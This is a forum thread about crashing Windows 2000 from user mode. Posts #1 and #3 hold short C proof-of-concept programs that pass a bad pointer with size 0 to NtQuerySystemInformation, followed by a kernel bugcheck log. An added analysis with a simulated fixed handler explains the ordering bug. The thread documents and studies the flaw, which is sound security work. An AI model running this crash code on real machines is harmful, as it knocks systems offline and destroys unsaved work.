Thread: How to BSOD win2k

  1. #1

    By accident I've found a way to BSOD win2k from usermode pretty reliably:

    Code:
    #include <windows.h>
    #include <stdio.h>

    typedef DWORD (WINAPI *NtQSI) (DWORD, void*, DWORD, DWORD*);     // NtQuerySystemInformation

    int main()
    {
          byte* buf;                // deliberately left uninitialized, see the comment below
          DWORD size;
          DWORD dwReturn;
          NtQSI NtQuerySystemInformation = (NtQSI) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");

          if (NtQuerySystemInformation == 0)
          {
                printf("Error: couldn't get NtQuerySystemInformation\n");
                return -1;
          }

          // get required buffer size – BUG, should be (11, buf, 1, &size), buf should hold at least 1 initialized byte
          NtQuerySystemInformation(11, buf, 0, &size);   // ModuleInformationClass
          buf = new byte[size];

          // the real call
          dwReturn = NtQuerySystemInformation(11, buf, size, &size);
          delete[] buf;
          return dwReturn;
    }

    NtQuerySystemInformation is supposed to return the required buffer size if passed too small a buffer - though it apparently tries to write something there even if passed size = 0.

    Code:
    *** Fatal System Error: 0x00000050
                           (0xCCCCCCCC,0x00000001,0x8049301B,0x00000000)
    
    Break instruction exception - code 80000003 (first chance)
    A fatal system error has occurred.
    Debugger entered on first try; Bugcheck callbacks have not been invoked.
    
    […]
    
    BugCheck 50, {cccccccc, 1, 8049301b, 0}
    Probably caused by : ntoskrnl.exe ( nt!ExpQueryModuleInformation+c3 )
    
    […]
    
    PAGE_FAULT_IN_NONPAGED_AREA (50)
    Invalid system memory was referenced.  This cannot be protected by try-except,
    it must be protected by a Probe.  Typically the address is just plain bad or it
    is pointing at freed memory.
    
    Arguments:
    Arg1: cccccccc, memory referenced.
    Arg2: 00000001, value 0 = read operation, 1 = write operation.
    Arg3: 8049301b, If non-zero, the instruction address which referenced the bad memory
                address.
    Arg4: 00000000, (reserved)

    XP behaves correctly though, even with uninitialized buffer and size=0.
    Vulnerant omnes, ultima necat.

  2. #2
    Administrator dELTA
    Hehe, cool, nice work.

  3. #3
    Well, it's not crashing anymore... I guess I was too quick to call it "reliable".

    Edit: found one compiled executable that still "works" (crashes OS) for me, have to take a look at it

    Edit2: Finally, reproduced the crash. Sample code:

    Code:
    #include <windows.h>

    typedef DWORD (WINAPI *NtQSI) (DWORD, void*, DWORD, DWORD*);    // NtQuerySystemInformation

    int main()
    {
        DWORD size;

        NtQSI NtQuerySystemInformation = (NtQSI) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");

        NtQuerySystemInformation(11, (void*)0xcccccccc, 0, &size);
        return 0;
    }
    Last edited by omega_red; December 13th, 2005 at 09:24.
    Vulnerant omnes, ultima necat.
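    What posts #1 and #3 describe is an ordering bug on the kernel side of a length-query contract: the caller is allowed to ask "how big a buffer do I need?" with a short length, and the information class handler answered that question only after it had already stored something through the caller's pointer, without probing it. The address in the bugcheck, 0xCCCCCCCC, is the pattern MSVC debug builds fill uninitialized stack memory with, which is why the uninitialized `buf` of the first post and the explicit pointer of the third produce the same crash; it also lies in the kernel half of the 32-bit address space, which is why, as the bugcheck text says, try/except could not have caught the write and only a probe would have. The C program below is an added, constructed simulation of that contract, not code from this thread or from Windows: a small module table and a byte array stand in for the kernel's module list and the process's valid user memory, so it runs anywhere. Everything prefixed `sim_`, the module names and the size layout are assumptions; the two NTSTATUS values are the real ones. It contrasts a handler with the Win2k ordering (early unchecked write) against one with the XP-style ordering (answer the size, then probe, then write), and shows the grow-and-retry loop a well-behaved caller uses, which also never needs a garbage pointer with size 0.

```c
/* Constructed simulation of the NtQuerySystemInformation length-query
 * contract. Nothing here calls the real Windows kernel. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint32_t NTSTATUS;
#define STATUS_SUCCESS              0x00000000u
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004u  /* real NTSTATUS value */
#define STATUS_ACCESS_VIOLATION     0xC0000005u  /* real NTSTATUS value */
#define SIM_BUGCHECK_PAGE_FAULT     0x00000050u  /* stands in for bugcheck 0x50 */

/* Constructed stand-in for the kernel's loaded-module table. */
static const char *const sim_modules[] = { "ntoskrnl.exe", "hal.dll", "ntdll.dll" };
#define SIM_MODULE_COUNT   3u
#define SIM_NAME_LEN       16u
#define SIM_REQUIRED_BYTES (4u + SIM_MODULE_COUNT * SIM_NAME_LEN)  /* count + names */

/* The only memory the simulated user process validly owns. */
unsigned char sim_user_heap[256];

/* ProbeForWrite stand-in: is [p, p+len) entirely inside the user region? */
static int sim_probe_for_write(const void *p, uint32_t len)
{
    uintptr_t lo = (uintptr_t)sim_user_heap, hi = lo + sizeof sim_user_heap;
    uintptr_t a  = (uintptr_t)p;
    return a >= lo && a <= hi && len <= hi - a;
}

static void sim_fill_buffer(unsigned char *out)
{
    uint32_t n = SIM_MODULE_COUNT;
    memcpy(out, &n, 4);
    for (uint32_t i = 0; i < n; i++) {
        char *slot = (char *)out + 4 + i * SIM_NAME_LEN;
        memset(slot, 0, SIM_NAME_LEN);
        strncpy(slot, sim_modules[i], SIM_NAME_LEN - 1);
    }
}

/* Buggy handler, modelled on the Win2k behaviour in the thread: the count is
 * stored through the caller's pointer BEFORE the length check, with no probe.
 * The simulation reports an out-of-region write as a bugcheck instead of faulting. */
NTSTATUS sim_query_modules_buggy(void *buf, uint32_t len, uint32_t *ret_len)
{
    uint32_t n = SIM_MODULE_COUNT;
    if (!sim_probe_for_write(buf, 4))     /* the real code had no such check ... */
        return SIM_BUGCHECK_PAGE_FAULT;   /* ... so this store bugchecked        */
    memcpy(buf, &n, 4);                   /* unconditional early write           */
    *ret_len = SIM_REQUIRED_BYTES;
    if (len < SIM_REQUIRED_BYTES)
        return STATUS_INFO_LENGTH_MISMATCH;
    sim_fill_buffer(buf);
    return STATUS_SUCCESS;
}

/* Fixed handler: answer the size question without touching buf, then probe the
 * whole range before the first write. A bad pointer becomes a status code. */
NTSTATUS sim_query_modules_fixed(void *buf, uint32_t len, uint32_t *ret_len)
{
    *ret_len = SIM_REQUIRED_BYTES;
    if (len < SIM_REQUIRED_BYTES)
        return STATUS_INFO_LENGTH_MISMATCH;
    if (!sim_probe_for_write(buf, len))
        return STATUS_ACCESS_VIOLATION;
    sim_fill_buffer(buf);
    return STATUS_SUCCESS;
}

typedef NTSTATUS (*sim_query_fn)(void *, uint32_t, uint32_t *);

/* Caller side: grow-and-retry loop starting from a small but genuinely owned
 * buffer, never from an uninitialized pointer with size 0. */
NTSTATUS sim_query_with_retry(sim_query_fn query, uint32_t *module_count_out)
{
    uint32_t len = 16, needed = 0;
    NTSTATUS st;
    for (;;) {
        if (len > sizeof sim_user_heap)
            return STATUS_INFO_LENGTH_MISMATCH;   /* cannot grow any further */
        st = query(sim_user_heap, len, &needed);
        if (st != STATUS_INFO_LENGTH_MISMATCH)
            break;
        len = needed;                             /* retry with the reported size */
    }
    if (st == STATUS_SUCCESS)
        memcpy(module_count_out, sim_user_heap, 4);
    return st;
}

int main(void)
{
    void *garbage = (void *)(uintptr_t)0xcccccccc;   /* MSVC debug fill pattern */
    uint32_t needed = 0, count = 0;
    printf("buggy, garbage ptr, len 0: 0x%08x\n", sim_query_modules_buggy(garbage, 0, &needed));
    printf("fixed, garbage ptr, len 0: 0x%08x (needs %u bytes)\n",
           sim_query_modules_fixed(garbage, 0, &needed), needed);
    printf("fixed, retry loop:         0x%08x (%u modules)\n",
           sim_query_with_retry(sim_query_modules_fixed, &count), count);
    return 0;
}
```

    Two things are worth noticing when running it. The buggy handler is harmless as long as the pointer is valid, even with length 0, which matches the "(11, buf, 1, &size)" remark in post #1: the retry loop completes against either handler. And the fixed handler never reaches the probe when the length is too short, so a garbage pointer combined with size 0 is answered with STATUS_INFO_LENGTH_MISMATCH and the required size, exactly the XP behaviour reported at the end of post #1.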

  4. #4
    Nice work. You found a buffer-overflow vulnerability.
